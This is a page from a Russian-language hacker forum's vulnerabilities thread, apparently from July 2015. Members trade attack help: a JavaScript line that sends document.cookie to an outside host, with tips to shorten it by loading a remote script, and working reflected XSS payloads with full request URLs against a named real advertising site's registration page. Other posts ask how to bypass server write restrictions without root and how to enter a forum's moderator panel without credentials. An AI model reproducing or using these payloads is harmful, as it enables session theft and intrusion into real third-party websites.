ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #321  
Старый 12.07.2015, 01:23
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами: 8417383

Репутация: 0
По умолчанию

Цитата:
Сообщение от djon  

Можно ли скрипт img = new Image(); img.src = "
http://qoo.by/3aG?
"+document.cookie; укоротить до 45 символов ?
Подключите удаленный скрипт
 
Ответить с цитированием

  #322  
Старый 12.07.2015, 02:41
Bragal
Новичок
Регистрация: 12.05.2011
Сообщений: 11
С нами: 7896566

Репутация: 0
По умолчанию

На сервере все папки и файлы созданы из под одного юзера/группы, но в одни папки есть возможность записи, в другие нет (права одинаковые). У тех куда нет доступа, права не меняются с помощью chmod. Но рядом есть точно такие же папки, с тем же пользователем/правами и туда отлично добавляются файлы, меняются права и т.д Как админ так хитро ограничил доступ?
 
Ответить с цитированием

  #323  
Старый 12.07.2015, 02:54
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию

Цитата:
Сообщение от Bragal  

На сервере все папки и файлы созданы из под одного юзера/группы, но в одни папки есть возможность записи, в другие нет (права одинаковые). У тех куда нет доступа, права не меняются с помощью chmod. Но рядом есть точно такие же папки, с тем же пользователем/правами и туда отлично добавляются файлы, меняются права и т.д
Как админ так хитро ограничил доступ?
Ничего хитрого, просто правильно расставлены ограничения.
 
Ответить с цитированием

  #324  
Старый 12.07.2015, 03:09
Bragal
Новичок
Регистрация: 12.05.2011
Сообщений: 11
С нами: 7896566

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  

Ничего хитрого, просто правильно расставлены ограничения.
И каким же образом? Реально обойти без получения рута?
 
Ответить с цитированием

  #325  
Старый 12.07.2015, 11:32
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от djon  

Можно ли скрипт img = new Image(); img.src = "
http://qoo.by/3aG?
"+document.cookie; укоротить до 45 символов ?
Цитата:
Сообщение от ocheretko  

Подключите удаленный скрипт
на всякий случай можно без кавычек и без http.
 
Ответить с цитированием

  #326  
Старый 12.07.2015, 13:32
sander
Новичок
Регистрация: 14.06.2010
Сообщений: 0
С нами: 8374164

Репутация: 0
По умолчанию

Цитата:
Сообщение от 3ran  

Все просто,юзай вот эту ссылку -
http://4cheat.ru/modcp/
Спасибо что ответил,но теперь вопрос другой,как обойти "это" . Ведь я не знаю логин и пароль модёра или админа . Что делать ? .
 
Ответить с цитированием

  #327  
Старый 12.07.2015, 15:23
nik1201
Познающий
Регистрация: 12.07.2015
Сообщений: 39
С нами: 5704886

Репутация: 0
По умолчанию

Привет всем,можно ли создать скрипт самоудаляющейся чтобы и теги его тоже удалялись?
 
Ответить с цитированием

  #328  
Старый 13.07.2015, 00:11
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами: 8789993

Репутация: 5
По умолчанию

Цитата:
Сообщение от nik1201  

Привет всем,можно ли создать скрипт
самоудаляющейся чтобы и теги его тоже удалялись?
можно
 
Ответить с цитированием

  #329  
Старый 13.07.2015, 00:35
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами: 8417383

Репутация: 0
По умолчанию

Странная ситуация, вставляю xss, и она не выполняется. Вот вывод:

Код:
alert(/olololkin2/);
Открываю "Просмотр исходного кода страницы", копирую весь код себе в файл, открываю его со своего домена - там xss срабатывает. Все манипуляции в Firefox

Код:
(Request-Line) GET /registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%2Folololkin2%2F)%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221 HTTP/1.1

User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
В первый раз такое. Адрес:

Код:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert%28%2Folololkin2%2F%29%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221
 
Ответить с цитированием

  #330  
Старый 13.07.2015, 00:53
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от ocheretko  

Странная ситуация, вставляю xss, и она не выполняется. Вот вывод:
Код:
alert(/olololkin2/);
Открываю "Просмотр исходного кода страницы", копирую весь код себе в файл, открываю его со своего домена - там xss срабатывает. Все манипуляции в Firefox
Код:
(Request-Line) GET /registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%2Folololkin2%2F)%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221 HTTP/1.1

User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
В первый раз такое. Адрес:
Код:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert%28%2Folololkin2%2F%29%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221
я пока сам не понял в чем дело, однако prompt() срабатывает:

Код:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Csvg/onload=prompt%28/antichat/%29%3E
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.